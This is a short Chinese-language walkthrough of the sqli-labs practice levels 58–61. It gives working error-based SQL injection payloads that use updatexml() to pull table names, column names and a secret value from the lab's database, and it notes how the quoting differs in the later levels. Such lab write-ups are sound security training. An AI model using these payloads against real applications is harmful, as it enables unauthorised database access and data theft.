sqli-labs Less-58-61

• Less-58
  没搞懂这个是怎么回显了，因为并没有回显账号密码而是回显了两个账号
  因为有报错回显，报错注入/updatexml()/extractvalue()即可
  单字符注入，构造payload：

?id=0' or updatexml(1,(select concat('$',(select table_name from information_schema.tables where table_schema='challenges'))),1)%23

1.png

查询到表名

?id=0' or updatexml(1,(select (concat('$',(select group_concat(column_name) from information_schema.columns where table_name='F56RAUOT8S'))) from information_schema.tables limit 0,1),1)%23

这里表名和上图不同，因为超过5次刷新了（懒得重新截了）

2.png

?id=0' or updatexml(1,(select (select concat('$',secret_KORT) from challenges.F56RAUOT8S limit 0,1) from information_schema.tables limit 0,1),1)%23

3.png

注入成功
updatexml()等报错注入由于报错信息有长度限制，所以无法一次性报出很长的信息，可以用substr函数进行截取，分段爆出。

• Less-59
  数值型注入，其他一样

• Less-60
  双字符，一个括号，其他同上

• Less-61
  单字符，两个括号，其他同上